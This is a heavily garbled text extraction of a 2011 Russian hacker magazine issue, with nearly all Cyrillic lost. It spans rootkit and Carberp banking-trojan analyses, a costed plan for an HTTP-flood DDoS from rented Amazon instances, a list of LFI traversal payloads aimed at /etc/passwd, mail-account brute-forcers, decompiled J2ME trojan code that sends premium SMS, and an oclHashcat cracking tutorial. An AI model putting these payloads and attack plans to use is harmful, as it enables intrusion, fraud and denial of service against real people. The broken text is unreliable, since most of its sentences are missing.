ret_value = eval('target.' + name + '(' + par_str + ')');
} catch (e) {

Firebug,
( ). ( , )
C:\Documents and Settings\username\Application Data\Mozilla\Firefox\
Profiles\XXXXXX.default\js. , :
Chrome: Firebug Lite for Google Chrome (
Chrome);
Opera: Opera Dragonfly;
Safari: WebKitDeveloperExtras.
, cross_fuzz, ,
, .

( , ) .
, .
,
. , . ,
, DEP/
ASLR (

062

][ , , ).
.
,
. ()
, ,
.
, .
,
. , ,
:
Internet Explorer (mzl.la/mC8XP5);
Firefox (bit.ly/jiHbQA).
Safari (bit.ly/jiHbQA) , (Webkit.dll, JavaScriptCore.dll)
. ,
, WebKit .
svn.webkit.org/repository/webkit,
trac.webkit.org/wiki/BuildingOnWindows.
Chrome.
, .
--single-process:
.
Safari, 0day,
.

?
Firefox :
, ,
. (heap).
Firefox, :
.
Chrome:
, ,
Firefox .
Safari:
, . :).
. ,
. : . : SVG,
. , ,
. ,
100%
, . , , , , Safari Positive Hack Days. z
X 08/151/ 2011

QWERTY, 12345, GFHJKM


Anonymous Lulzsec
. , torrent' Sony Pictures,
40 .
(www.troyhunt.com) .


12,000

0
1

10 11

12 13 14 15 16 17 18 19 20

, . 93% 6 10 (,
), 50% 8 . ,
.

45%

4%
1%
, .
,
,
, .

2,000

50%

4,000

6,000

8,000

10,000

8%
36%

64%

,
?
1,7 (dazzlepod.com/
site_media/txt/passwords.txt) , .
,
!
X 08/151/ 2011

18%

92%

: ?. Sony Pictures ,

. ,
92% .

82%

Sony Pictures (
!), , 82% (projectrainbowcrack.com).
9 .

063

TDL4

- TDL4

C PHD2011 ,
Olmarik (TDL4). PHD
,
.
, ,
. x64- ,
,
.

64- MS Windows (Vista,


Win7) , ,
, .
. , - Win64/
TrojanDownloader.Necurs,
, ( ) (Bcdedit.exe
-set TESTSIGNING ON) Boot Configuration Data (BCD)
TESTSIGNING.
. Win64/Spy.Banker,
TDL4

.
TDL4
, MBR (Master
Boot Record),
ZwRaiseHardError(), BSOD .
(. . 1).
, MBR,
MBR . (. . 2).
,
,

064

(ROR)
. ldr16,
.
ldr16 BCD
, .
(. . 3).
ldr16
BcdOSLoaderBoolean_WinPEMode (0x26000022),
preinstallation mode, . kdcom.dll,
WinDbg.
kdcom.dll
ldr32 ldr64, , /MININT,
M/
NI, .
:
kdcom.dll? , ,
KdDebuggerInitialize1(),
kdcom.dll, . ,
PsSetLoadImageNotifyRoutine(), .

IoCreateDriver(), -.

.
, (. . 4).
, MS ,
KB2506014,
WinPEMode
kdcom.dll. , X 08/151/ 2011

[1]

[2]

[3] Boot Configuration Data


Win32/Olmarik.AMN,
:).

,
.

.
.
,

TdlFsReader (eset.ru/tools/TdlFsReader.exe).

, TDL3. , :

;

;
;
.
TdlFsReader
.
,
,
,
X 08/151/ 2011

[4]

[5] TdlFsReader
. , TDL4,
,
.
,
TDL
. , ,
. z

065


, Positive Technologies

CLOUD
HACKING




. cloud computing

.
IaaS

:
SaaS (Software as a Service)
PaaS (Platform as a Service)
IaaS (Infrastructure as a Service)
HaaS (Hardware as a Service)
WaaS (Workplace as a Service)
IaaS (Infrastructure as a Service)
EaaS (Everything as a Service)
DaaS (Data as a Service)
SaaS (Security as a Service)
IaaS, . IaaS

.

. IaaS ?


:
IPS ;
;
;
;
.
,
,
.
? .

066


. , ,
,
.
, ,
- .
, -,

. , ,
IP-,
. ,
.

,
.
, ,
. :
IP-, ,
,
.

IaaS , IPS/IDS.
X 08/151/ 2011

EC2:
20

IPS/IDS
, IP-
, . IPS/IDS , ,
IP- , .
, ,
,
.

IaaS-
. , ,
client-side-. -,
, ,
metasploit canvas. -,
,
, IP-
. , IaaS ,
, IaaS,
.



.


.
ntlm (mixalpha-numeric-all-space, 8 ) .

ssh
1290 . ,
,
1,5
$320k. , ,
, 1,5
. 1
.
20 : 2 x
Intel Xeon X5570 quad-core Nehalem architecture, 2 NVidia
Tesla M2050, 23 .
,
NTLM- 8
. .
8
. ,


(www.ptsecurity.ru/download/PT-Metrics-Passwords-2009.pdf),
, -

Instance

20

$6590 + $0,56/hour

Data Storage

418 Tb

$ 102 / Tb

:
X 08/151/ 2011


20 * $6590 = $131 800
$ 0,56 * 20 * 12834 = $ 143 740
$ 102 * 418 =$ 42 636
$ 318 176

067

( 1 12 )

$ 103

(low-case) ( 1 12 )

21

$ 2 363 252

( 1 11 )

275

$ 754 064

(low-case) ( 1 10 )

11

$ 9 823

(low-case) ( 1 12 )

1046

$ 80 919 507

(low-case) ( 1 11 )

27

$ 4 631 216

(low-case) ( 1 10 )

297

$ 188 884

(low-case) ( 1 9 )

11

$ 9 695

Instance ()

$0,085 ~ 3

(in+out) ()

$0,150 ~ 5

3

.
2 .
,
, (lowcase) ( 1 12 )
80 . ,
. , 20 000
20, .
DDoS
- /. -:
;
.
IaaS DDoS- ,
-. IaaS
.

.

. :
(Linux/Windows);
;
(<->).
:
SYN flood
UDP flood

ICMP flood
Application flood
HTTP/HTTPS (GET/POST)
FTP
SMTP/SMTP+SSL/TLS
POP3/POP3+SSL
,
.
,

.
:
Mauszahn (www.perihel.at/sec/mz/)
( , ). VoIP
,
,
.
SlowPost.pl ( SlowLoris HTTP DoS Tool)
, HTTP
POST- -, (
).
SlowLoris HTTP DoS (ha.ckers.org/blog/20090617/
slowloris-http-dos/). Application Flood
HTTP POST-

Defcon 18 (bit.
ly/lid5Sr).
Application Flood HTTP, , ,
(
- Defcon) ,
.

Application Flood,
. SlowPost.pl
Application Flood. , -

Instance

$0,085 ~ 3 /

(in+out) ()

<1

<$0,150 ~ <4

<7 /

068

X 08/151/ 2011

Rainbow tables
900
- .
, - Apache.
MaxClients 256: -
256
. - IIS (Windows 2003 Server),
Apache, , 20 000.

IaaS Amazon (aws.amazon.com).
. -, Amazon ,

. -,

, 3, ,
Amazon .
Instance, , :
x86/x64 (1 CPU);
613 ;
10 HDD.
Instance , ,
. Instance
100 Mb/s,

.
.
,

HTTP-.
, 1 Instance + SlowPost.pl
900 -.
, ,
-, 900. ,

, .
- 7 ! (.
4)
, IIS.
IP-. ,
, 20 000
IP-. -
. ,

46 Instance, 900 . , Amazon 20
Instance. , DDoS-, . ,
-. ,
300 .
- (Prepaid Card For
Internet Shopping) $5 Amazon . ,

AMI

HTTP DoS -

X 08/151/ 2011

069

900

Instance

46

$0,085 * 46 * 2 = ~ 240

(in+out) ()

<2
:

<$0,150 ~ <8
1150

- 1150 .
5.
-
,
-.

Instance


-.
,
, ,
. ,
. ,
, , : ,
, ,
, .
, .
:
AMI
;
( , ..);

,
HTTP-GET- ,
.
, .
1000 ! , .

, .

Abuse-

,
.

070

. ,
, (, Amazon), abuse
. ,
. -,
, , IP- , .
,
.
:
, , , .

,
:
IP- ;
IP- ;
, ;
, ;
, (
4 );
.

. , IP-
,
.
-

.

,
,
. . ,
,
. z
X 08/151/ 2011


(icq 884888, snipper.ru)


blackhat

X-TOOLS
: Witchxtool
: *nix/win
: th3_w1tch

: MRBrute
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: [i]Pro, Dark-web.ws

!
,
Makassar Ethical
Hacker .
,
LFI.
,
LFI (Local File
Include). :
Target : http://site.com/index.
php?page=
# LFI,
:
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
..


MD5, SQL,
proxylist.net ..

, .
Data::Validate::IP:
cd modules
cd-Net-RawIP 00:25
perl Makefile.PL
make & & make install

072

Mail.Ru

Mail.Ru.

:

(
);
Delimiter Source:
<Login>:<Password>;
Type Proxy .


.
:
, .
Generate
Source.txt.

:
HTTP Proxy
.

: MGrab
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: Boolean

( 150
);
(HTTP/SOCKS4/5);
;

(
,
);
;
.NET Framework.



:
Bad ;
Good Good ()
;
Source ,
email@mail.ru:
password;
Proxy
;
Threads ;
TimeOut

Mail.Ru
Mail.Ru.
-,

MRBrute.
otvet.mail.
ru, . :
;
;
X 08 /151/ 2011

;
;
;

For Grab (:
friends, auto, business, countries,
magic, relax, food ..).


,
.

: Reallogger
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: Van32

TDS Killer ,

(TDS). : Simple TDS Advanced TDS.
:
my $thr = 20; # -
my $tds_type = 0;
# 0 Simple TDS; 1 Advanced TDS

good.txt,
.
bit.ly/iiv2S3.
.

: ICQ Multiregger
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: Zdez Bil Ya

tds.txt
TDS, login.txt pass.txt
.
.
,
.
:
Simple TDS inurl:go.php?sid=
Advanced TDS out.php?s_id=


Reallogger fuckav.ru Van32.
,

.
: ,
FTP- php- POST-.
:

tds_checker.pl,
.
bit.ly/mwL4hO.

: Rambler Regger
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: Zdez Bil Ya

HKCU\Software\Microsoft\Windows\
CurrentVersion\Run :AntVir
c:\documents and settings\admin\local
settings\application data\antvir.exe


FuckAV: bit.ly/
jIClsC.

:TDS Killer
: *nix/win
: daniel_1024


Rambler

TDS

Zdez Bil Ya.


email
Rambler.ru. ( socks),

Antigate. , -

X 08 /151/ 2011

Zdez Bil Ya icq.com,


, , . ,
email- (
Rambler Regger).

,

, . :
;
;
;
;
: email;
( );

good.txt;
: mail.ru (bk.ru, inbox.
ru, list.ru), yandex.ru, rambler.ru;

, POP-
pop.site.domain.

,
:). : bit.ly/k8yQzt. z

073

MALWARE
, Malware Analyst Group-IB (Slim_d0g@mail.ru)
, Malware Analyst Group-IB (iRe9ent@gmail.com)

Win32/TrojanDownloader.Carberp

GENERATION
CARBERP


Win32/TrojanDownloader.Carberp
Win32/Carberp , 2010
, , .


. Zeus
SpyEye.
.
?

, , VirusTotal.com,
,
.

074

BinDiff IDA, ,
.
HIEW, . -, PE-. -, .text
, , ,
X 08 /151/ 2011

Win32/TrojanDownloader.Carberp

Win32/TrojanDownloader.Carberp

GMER - -
(kernel32.dll advapi32.dll),
(EqualPrefixSid),
. . , . .reloc
, .
.
, ,
,
, (.
1).
.

-
.
, . ,
.

,
, Windows (ntdll.dll, kernel32.dll ws2_32.dll). ,
.
, ,
10 ,
. , -
, 10 , .
, Carberp \ API Monitor
:).
API- .
, ,
. , -

, TaskManager

,

, ,
OllyDbg IDA,
.
,
,
.


-
.
, explorer.exe.
.

ESET

Win32/TrojanDownloader.Carberp.W

641C4FF3047077231A92931D75C20017

Win32/TrojanDownloader.Carberp.X

D9D92134F12469A68FCA24F49F1CC608

a variant of Win32/Kryptik.LKI ( )

74995A8F06E1268A43E1CF26A36DFF84

1.
X 08 /151/ 2011

075

MALWARE

Win32/TrojanDownloader.Carberp

Win32/Troja

TrojanDownloader.Carberp

Win32/TrojanDownloader.
Carberp.W
trojan

Win32/TrojanDownloader.
Carberp.X trojan

Win32/TrojanDownloader.Carberp.X
trojan


Section


"Section"

QueueAPCThread()

API

2. ,
, CreateProcess
CREATE_SUSPENDED, , explorer.
exe. ZwCreateSection (SectionObject ,
) (, , ).
ZwMapViewOfSection
memcpy
. ,
explorer.exe,
. ,
explorer.
ReadProcessMemory explorer.exe ,
,
. ,
,
memcpy explorer
.
,
. , explorer
, .
explorer.
ZwResumeThread, ,
.
, Carberp , payload
. ,
API-.
Carberp explorer.exe.

076

,
, .
ZwQueueApcThread,
explorer ,
. ZwResumeThread
.

,
, . ,
, Carberp ,

%HOMEDRIVE%\%HOMEPATH%\StartMenu\Programs\StartUp\.
, ! ,
.
explorer.exe, -

explorer.exe, 1
X 08 /151/ 2011

Win32/TrojanDownloader.Carberp

rojanDownloader.Carberp

Win32/TrojanDownloader.Carberp


, explorer.
PID-. ,
. FindWindow ("Shell_
TrayWnd", 0) GetWindowThreadProcessId (hWnd, &id),
, id PID.
- id=0,
.
PID ,
explorer ZwOpenProcess +
WriteProcessMemory.
NtQueryDirectoryFile NtResumeThread
ntdll.dll. (, RootkitUnhooker),
. , KiFastSystemCall (. ).
? NtQueryDirectoryFile
, . ( explorer cmd)
.
, . NtResumeThread
explorer (!)
. , explorer , PID
,
. ,
, explorer, .
,
Carberp. ,
, 2.

,
. ,

, IBank
Zeus
.
,
,
,
cab-
.


. .

1 :
1. 1.
2. GET-, :
uptime;
downlink;
uplink;
id ( ,
);
statpass ( );
comment.
:
/stat?uptime=<val1>&downlink=<val2>&uplink=<val3>
&id=<val4>&statpass=<val5>&comment=<val6>
3. .
2 :

explorer.exe, 2
X 08 /151/ 2011

explorer.exe, 3

077

Win32/TrojanDownloader.Carber

MALWARE

Win32/TrojanDownloader.Carberp

explorer.exe

IDE

1. .
:
ok;
badpass;
session: < >.
3 :
1. :
ok ;
badpass, session
.


1 :
1. POST- 2, :
, ;
,
.
:
1|palladin|05B45905A93F7D4B843D385AAE079AF1|0|0
:
a=e15e327af46a915c1b0014a284c052787ea7d63c8c40b1
a3dcafea6bb8e7076b0f6601861783dff7cbca429eb76a47
.
2. .cab-
2.
3.
. ,
, :
0|check|00000000000000000000000000000000|
2 :
1. .
.
2. . (.
3).
3 :
1. (. 4).
, Carberp :

update

update

dexec

download

killbot

killuser

startsb

loaddll
grabber

3. , ,

078

X 08 /151/ 2011

berp

Win32/TrojanDownload
Win32/TrojanDownloader.Carberp

.text
, , , .
,
.
,
. , .
, , ,
-.


, .
miniav.plug, killav.plug
passw.plug ( ,
Carberp ).
python, , . ,
miniav.plug
Carberpa , , Zeus,
. killav.plug
, passw.plug
.

, ,
, , .

. ,
.
Carberp. z

update

update

PE-

dexec

download

PE-

killbot

killuser

startsb

loaddll

grabber

4.
X 08 /151/ 2011

079

MALWARE

. 1.

Sjboy

. 2.

J2ME

Sjboy

J2ME-


. ,
,
.
,
.
, Java 2 Micro Edition (J2ME).
,
( , :)).
. ,
Sjboy.

(. . 1).
.
. ,
. (,
):
,
. ,
c ,
.

.

, . ,
(, - ):
aa popaa aao coaa pecpa,
oopa opa a ocy aoy apoy apxy

080

poecx apyo, oope ocy a c 18 e


oee. Cay popay B aaee ecao, oaa
pocxo oo a pa o apy aeo oepaopa, a
a opaeoe cooee ae, Bae cooc cc
cooe opay oopx apoc poee cocoe:
a oep 5370 ~10.31$ (15 ), 5373 ~4.57$ (7 ),
7250 ~3.64$ (3 ) .e ec: caa ecao a cae
acaec oo aa poe, a a cooe oopoe
ocae poee, ae. poee apoc
opay sms!!! o apecppoac apo
poeco apxe, B aaee a. ocaoo aa
o pa, aee 2 paa cy co cea, a a 2 sms, ec
aee 3 paa, o cyy cy 3 paa cooeceo. 3 , !

? ,
?! , , ,
. .
,
, .
,
,
. .
X 08 /151/ 2011

, . JAR.
ZIP, . , .
J2ME- midlet.class.
.class Java.
, C/C++: .c/.cpp .obj. Java class , ,
JAD. . , ,
midlet.class, class,
.
, sendNextSms. ,
, . ,
, . ,
. midlet.class
:
if (e_boolean_fld)
{
e_boolean_fld = false;
sendNextSms();
}

, , e_boolean_fld true. :
if(i == b.b && mode > 4 && mode < 6)
{
e.a(e.f, e.g);
if(b.e > 1)
{
while(b.a_int_array2d_static_fld[rX][rY] == 0)
{
nextX();
nextY();
}
b.a_int_array2d_static_fld[rX][rY] = 0;
b.e--;
c_int_fld = 100 b.f * b.e;
if(c_int_fld > d_int_fld)
{
e_boolean_fld = true;
d_int_fld = d_int_fld + 11;
}
nextY();
return;
} else {
a_b_fld.a(d.a, null);
a_b_fld.b("!");
a_b_fld.a(e_java_lang_String_fld);
e.a(e.g, 0);
a_b_fld.serviceRepaints();
a_long_fld = System.currentTimeMillis();
mode = 6;
c_boolean_fld = true;
return;
}
}

, , ,
.
X 08 /151/ 2011


. , b.e . , :
a_b_fld.b(!);. ,
: b.e--;, . ,
e_boolean_fld, SMS,
: c_int_fld > d_int_fld.
, b.e , c_int_fld, , : c_int_fld = 100 - b.f
* b.e.
sendNextSMS
():
String s1 = b_java_lang_String_fld;
String s = c_java_lang_String_fld;
c c1 = a_c_fld;
System.gc();
if(c1.a_java_lang_Thread_fld == null)
{
c1.a_boolean_fld = false;
c1.a_java_lang_String_fld = s1;
c1.b = "sms://" + s;
c1.a_java_lang_Thread_fld = new Thread(c1);
c1.a_java_lang_Thread_fld.start();
}
try
{
Thread.sleep(300L);
}
catch(Exception _ex) { }

c1. ,
s , SMS, s1 . , , ,
c1. :
MessageConnection messageconnection;
System.gc();
messageconnection = null;
TextMessage textmessage;
(textmessage = (TextMessage)
(messageconnection = (MessageConnection)Connector.open(b)).
newMessage("text")).setAddress(b);
textmessage.setPayloadText(a_java_lang_String_fld);
messageconnection.send(textmessage);

, , .
. ,
a_java_lang_String_fld: textmessage.setPayloadText(a_java_
lang_String_fld);. , b: (textmessage = (TextMessage)(messageconnection =
(MessageConnection)Connector.open(b)).newMessage("text")).
setAddress(b);. -

: messageconnection.send(textmessage);.

. ,
. ,
: -,
. , ,
. z

081


Mifrill (mifrill@real.xakep.ru)

HD MOORE
Metasploit

(HD Moore)
.
2000- - HITB
, :
. , , ,
!.
22 .

1981
-
. , HD
Moore, . ,
( H,
), D,
.
,
.

IT-, ,
.


. .
( ).
(
) ,

. ,

.
,

, ,
. ,
, 17
,
SHADOW
(Secondary Heuristic Analysis for Defensive

082

Online Warfare).
,

.
,
.

Yahoo.
white hat
Yahoo
,

.
.
,
,
Computer Sciences
Corporation
. ,

, , ,
,

.

,
. , , ,
( ) Metasploit.
, , , , , ,
HITB, :). ,

,
.

Metasploit 2003
,
.
,
, Metasploit
Framework . ,
.
,
.
,

.
(http://digitaloffense.net) Metasploit Framework : Metasploit -,

,
,

Metasploit .
Metasploit ,
- . , ,
- , -
Linux . SOURCE .
Perl
X 08 /151/ 2011


curses. ,
2006 ,
, Metasploit LLC,

.
BreakingPoint,
. BreakingPoint



,

Ruby ( , Python C).
, LEGO ,
,
.

Metasploit

,
Metasploit, 2005
X 08 /151/ 2011

,
, ,

. ,
. 4


, ,
BreakingPoint .

, ,
. ,
,
,
. , , :

,
iDefense?. Metasploit, ,

, , .
,
,

, -,

Metasploit .
,
, , (
),
- . ,
,

083

Metasploit
, , ,
. , ,

, CERT.
2009 ,
Metasploit Rapid7,
. ,
BreakingPoint, Rapid7 ,
.

, .
Metasploit Framework - ,
Metasploit Express,
$3000 , Metasploit Pro,
. , ,
2008 , Metasploit Framework
BSD.
,
, open-source.

,
. Metasploit ,
.
Rapid7, ,
9
.
, Metasploit. , ,
. ,
,
. , 2000-,
$5 000
PayPal- .
,
, ,
, .

2010 Rapid7 SANS


Metasploit Framework. :
, . , , - .
,
:).
, 2006
,
, , , AxMan.
ActiveX .

, .

Metasploit Framework -
,
Metasploit Express,
$3000

084

WarVOX,
, war-dialing. ,
-, , , .
8 10 000
. WarVOX .
- , WarVOX
. ,
, , ,
, . z
X 08 /151/ 2011

UNIXOID
(execbit.ru)

GPU

. ,
CUDA, Stream OpenCL, -
. ,
, , . , ,
.

,
GPGPU (General-purpose graphics processing units, ) . ,
,
, ,

, , ,
.

086

GPGPU

, ,
, , .
,
, ,
.

, .
, (X 08 /151/ 2011

()

AES OpenCL

KGPU Linux, GPU



KGPU (code.google.com/p/kgpu/),
Linux

CUDA.
Linux ,
,

CUDA. ,
,
, KGPU
AES,
eCryptfs 6 .

)
, .
,
.
x86-,
( ) , , SSE, , .. ..
,
, ,

, (
BrookGPU,
DirectX OpenGL).
,
,
,

GPU ( nVidia ).
nVidia CUDA, ,
GPU - .
ATi (AMD)
Close to Metal ( Stream),
X 08 /151/ 2011


Apple, OpenCL.

INFO

GPU ?

, GPGPU .
. GPU
(
,
),
.
GPU ,
. GPU
, ,
. GPU
. -
( ),
,
. GPU
,
,
, (, , ,
, ,
, ).
GPGPU ,
GPU .

,
. , , .
,
.
: ,
,
GPU :
GRAM . ,

info

GPGPU
.
OpenCL
SDK, Intel,


CPU.
FASTRA II
,
13 ,
12TFLOPS: fastra2.
ua.ac.be.

HTTP://WWW
links
bzip2-cuda.github.
com
bzip2

CUDA.
www.hoopoe-cloud.
com
,


CUDA OpenCL.

087

UNIXOID

nVidia CUDA
GPGPU
clinfo ,
Stream-
( FlacCL,
).
.
OpenCL,
GPGPU. CUDA,
(, OpenCL
nVidia CUDA),
.

, , GPGPU -
, , ,
( ). ,
. , , FlacCL,
FLAC. GPGPU
,
ImageMagick,
OpenCL. CUDA/OpenCL ( ATi) .
,
, , .
-, , CUDA Stream. , ,
, 2009.
:
en.wikipedia.org/wiki/CUDA en.wikipedia.org/wiki/AMD_Stream_
Processor.
, ,
,
.
-, ,
GPGPU, OpenCL.
-, GPGPU,
,
SDK : CUDA Toolkit (goo.gl/lbdxm) ATI Stream SDK
(goo.gl/YS2K). .

CUDA Toolkit

CUDA Toolkit Linux


( , Fedora,
RHEL, Ubuntu SUSE, x86,

088

x86_64). , (Developer Drivers for Linux, ).


SDK:
$ sudo sh cudatoolkit_4.0.17_linux_64_ubuntu10.10.run

, .
X-:
# sudo /etc/init.d/gdm stop

<Ctrl+Alt+F5> :
$ sudo sh devdriver_4.0_linux_64_270.41.19.run

:
$ startx

CUDA/OpenCL,
CUDA- LD_LIBRARY_PATH:
$ export LD_LIBRARY_PATH=/usr/local/cuda/lib64

, 32- :
$ export LD_LIBRARY_PATH=/usr/local/cuda/lib32

CUDA,
:
$ export C_INCLUDE_PATH=/usr/local/cuda/include

, CUDA/OpenCL-.

ATI Stream SDK

Stream SDK , AMD (


/opt) LD_
LIBRARY_PATH:
$ wget http://goo.gl/CNCNo
$ sudo tar -xzf ~/AMD-APP-SDK-v2.4-lnx64.tgz -C /opt
$ export \
LD_LIBRARY_PATH=/opt/AMD-APP-SDK-v2.4-lnx64/lib/x86_64/
$ export C_INCLUDE_PATH=/opt/AMD-APP-SDK-v2.4-lnx64/include/

CUDA Toolkit, x86_64 x86


32- . icd-registration.tgz (
):

X 08 /151/ 2011

OpenCL nVidia
CUDA Toolkit
$ sudo tar -xzf \
/opt/AMD-APP-SDK-v2.4-lnx64/icd-registration.tgz - /

/ clinfo:
$ /opt/AMD-APP-SDK-v2.4-lnx64/bin/x86_64/clinfo

ImageMagick OpenCL

OpenCL ImageMagick ,
.
IM .
, SDK,
-
nVidia AMD. , / :
$ wget http://goo.gl/F6VYV
$ tar -xjf ImageMagick-6.7.0-0.tar.bz2
$ cd ImageMagick-6.7.0-0

:
$ sudo apt-get install build-essential


OpenCL:
$ LDFLAGS=-L$LD_LIBRARY_PATH ./configure | \
grep -e cl.h -e OpenCL


:
checking
checking
checking
checking
checking
checking
checking

CL/cl.h usability... yes


CL/cl.h presence... yes
for CL/cl.h... yes
OpenCL/cl.h usability... no
OpenCL/cl.h presence... no
for OpenCL/cl.h... no
for OpenCL library... -lOpenCL

yes ,
( ). , , ,
C_INCLUDE_PATH.
X 08 /151/ 2011

FlacCL flac
no , , LD_LIBRARY_PATH. , /
:
$ sudo make install clean

, ImageMagick OpenCL:
$ /usr/local/bin/convert -version | grep Features
Features: OpenMP OpenCL

.
ImageMagick convolve:
$ time /usr/bin/convert image.jpg -convolve \
'-1, -1, -1, -1, 9, -1, -1, -1, -1' image2.jpg
$ time /usr/local/bin/convert image.jpg -convolve \
'-1, -1, -1, -1, 9, -1, -1, -1, -1' image2.jpg

, , , , ImageMagick
, .
OpenCL.

FlacCL (Flacuda)

FlacCL (www.cuetools.net/doku.php/flacuda)
FLAC,
OpenCL. CUETools (www.cuetools.net/doku.
php) Windows, mono Linux.
:
$ mkdir flaccl && cd flaccl
$ wget www.cuetools.net/install/flaccl03.rar

unrar, mono :
$ sudo apt-get install unrar mono
$ unrar x flaccl03.rar

OpenCL, :
$ ln -s $LD_LIBRARY_PATH/libOpenCL.so libopencl.so

089

UNIXOID

GPU x86-
:
$ mono CUETools.FLACCL.cmd.exe music.wav

Error: Requested
compile size is bigger than the required workgroup size of 32, ,
,
--group-size XX, XX .
, - OpenCL
. FlacCL ,
.

oclHashcat

, GPGPU
. ,
GPU-. ,
.
oclHashcat.
oclHashcat (hashcat.net/oclhashcat/) ,
,
GPU OpenCL.
, , MD5 nVidia GTX580 15800 , oclHashcat
- 9 .
OpenCL CUDA, MD5,
md5($pass.$salt), md5(md5($pass)), vBulletin < v3.8.5, SHA1,
sha1($pass.$salt), MySQL, MD4, NTLM, Domain Cached Credentials,
SHA256, .

090

(, -, ), Linux-, : hashcat.net/files/oclHashcat-0.25.7z.
:
$ 7z x oclHashcat-0.25.7z
$ cd oclHashcat-0.25

(
):
$ ./oclHashcat64.bin example.hash ?l?l?l?l \
example.dict

oclHashcat ,
, YES.
, <s>.
, <p>, <r>.
(, aaaaaaaa
zzzzzzzz):
$ ./oclHashcat64.bin hash.txt ?l?l?l?l \
?l?l?l?l

, ( docs/examples.txt).
11 ,
( aaaaaaaa zzzzzzzz) 40 . GPU ( RV710) 88,3 /.

, GPGPU
. , Windows-,
Linux. z
X 08 /151/ 2011

>> coding

UNIXOID
(execbit.ru)

1000


Linux. - : , ,
. . , .

?
:
1. ? !.
, ,
. , .
2. , .
, , , ,
, .
, , - .
.
? : .
, - , (
, ).
. ,
,

.

- ,
,
. ,
:

092

// , config.cfg,

$ cp config.cfg config.cfg.bak
// ,
$ vim config.cfg
// , ,
$ mv config.cfg.bak config.cfg

, . . ,

- .
.
,
, . , .
:
vim() {
FILE=$1
DATE=`date +'%F'`
BAK=.$FILE.bak
cp $FILE $BAK-$DATE
rm -f $BAK
ln -s $BAK-DATE $BAK
vim $FILE
}
X 08 /151/ 2011

btrfs

,

INFO

info
FreeBSD

Inotify kqueue,
,

, .

,
.
.

btrfs

mv .$1.bak $1
}

~/.bashrc, vim,

( ), ret,
.
,
,
.
X 08 /151/ 2011


, Inotify. Linux, ,
,

inotifywait.
Inotifywait ( inotify-tools)
, ,
,
, . :
, , .
inotifywait ,
,
, ,
:
$ vi ~/bin/in-back.sh
#!/bin/sh
DIR=`pwd`

WARNING
warning

fsniper

torrent-.
Torrent-


,

.

HTTP://WWW
links
distanz.ch/inotail/
tail, Inotify.

093

UNIXOID

$ vi ~/bin/in-back2.sh
#!/bin/sh
DIR=`pwd`
inotifywait -mr --timefmt '%d-%m-%y %H-%M' \
--format'%T %f' -e close_write $DIR | \
while read DATE TIME FILE; do
cp $FILE .$FILE.bak-$DATE-$TIME
done

, . '-m' inotifywait
, '--timefmt'
'--format' , , ,
. , , .
:
$ ls -la | grep -e '.*\.bak-\.*'

:
$ rm -rf *.bak-*

, ,
, incron fsniper,
inotify .

inotifywait /proc
while inotifywait -r -e modify $DIR; do
cp $DIR ~/bak/.$DIR.bak
done;


, . ,
inotifywait ,
.
:

inotifywait , , . incron.
incron, , Inotify-
cron. ,
, . , /,
, ,
. :
$@ /,
$# ,

094

X 08 /151/ 2011

$% ( )
$& ( )

cron-
incrontab, '-i'
. cron '-e'. , , :
[] [] []

/, ,
, ,
(
).

inotify inotifywait. :
IN_ACCESS (, )
IN_ATTRIB (
)
IN_CLOSE_WRITE File , ,

IN_CLOSE_NOWRITE File , ,
IN_CREATE
IN_DELETE
IN_DELETE_SELF
IN_MODIFY
IN_MOVE_SELF /
IN_MOVED_FROM

IN_MOVED_TO
IN_OPEN

, ,
/etc/incron.allow /etc/incron.deny, .
,
.
incrond .
, . ,
, .
, incrond /etc. :
$ export EDITOR=vim
$ sudo crontab -e

:
/etc IN_CLOSE_WRITE /bin/cp $@/$# $@/.$#.bak-`/bin/date +'%F'`

,

, , .

inotify- fsniper
(freshmeat.net/projects/fsniper).
, .
fsniper . incron ,
,
,
X 08 /151/ 2011


.
, , , , (,
). , ~/images, ~/video, ~/music .. , fsniper
, .
, .
,
. , ,
fsniper:
$ sudo apt-get install fsniper

:
$ mkdir ~/.config/fsniper

config :
$ vi ~/.config/fsniper/config
watch {
#
~/downloads {
image/* {
handler = cp %% ~/images
}
video/* {
handler = cp %% ~/video
}
audio/* {
handler = cp %% ~/music
}
}
}

, ,
. ,
mime-,
(, *.avi)
(.*HDRip.*).
fsniper
:
$ fsniper --daemon

, , , incron, fsniper
,
. Gnome KDE
,
~/.xsession:
$ vi ~/.xsession
fsniper --daemon &

, hand made-
, ,
Linux
. ,
.
, , -, .

095

UNIXOID

SSH- rsync
wayback (wayback.
sourceforge.net). ,
, ,
. wayback,
:
$ sudo apt-get install wayback

mount.
wayback:
$ mount.wayback // //

,
,
.
vstat:
$ vstat

vrevert:
$ vrevert -d 12:00:00

, 12 .

096

, , :
$ vrevert -d 2011:01:01:0:00:00

, , , vstat:
$ vrevert -n 5

,
, vrm:
$ vrm

, . , ?


.

.
,

.
,
X 08 /151/ 2011

first_snapshot
second_snapshot

btrfs copy-onwrite ( ), ,
.
.

wayback

.
ext3 ext4 ( ), btrfs, ,
Linux- ( 2.6.29-rc).
,
, .
btrfs , btrfsprogs ( btrfs-progs-unstable).
:

,
.
,
. ,
- .


rsync. /
, .
, ,

, , , .
rsync ,
,
.
.
rsync SSH.
:

$ sudo apt-get install btrfs-progs

,
:
$ sudo mkfs.btrfs /dev/sdXX
$ sudo mount /dev/sdXX /mnt

,
:
$ sudo btrfsctl -s first_snapshot /mnt

- :
$ sudo btrfsctl -s second_snapshot /mnt

,
.
,
,
subvol=_:
$ sudo umount /mnt
$ sudo mount -o subvol=first_snapshot /dev/hdXX /mnt


subvol=., :
$ sudo umount /mnt
$ mount -o subvol=. /dev/hdXX /mnt
$ ls -1
default
X 08 /151/ 2011

$ sudo apt-get install rsync


$ rsync -a --delete -e ssh /// \
@:///

, .

:
$ vi ~/bin/in-rsync.sh
#!/bin/sh
DIR=`pwd`
#
USER="vasya"
HOST="host.com"
REMOTEDIR="/backup"
inotifywait -mr --timefmt '%d-%m-%y %H-%M' \
--format'%T %f' -e close_write $DIR | \
while read DATE TIME FILE; do
rsync -a --delete -e ssh ${DIR}/${FILE} \
${USER}@${HOST}:${REMOTEDIR}
done


.
, rsnapshot, .

,
. , ,
. z

097

UNIXOID
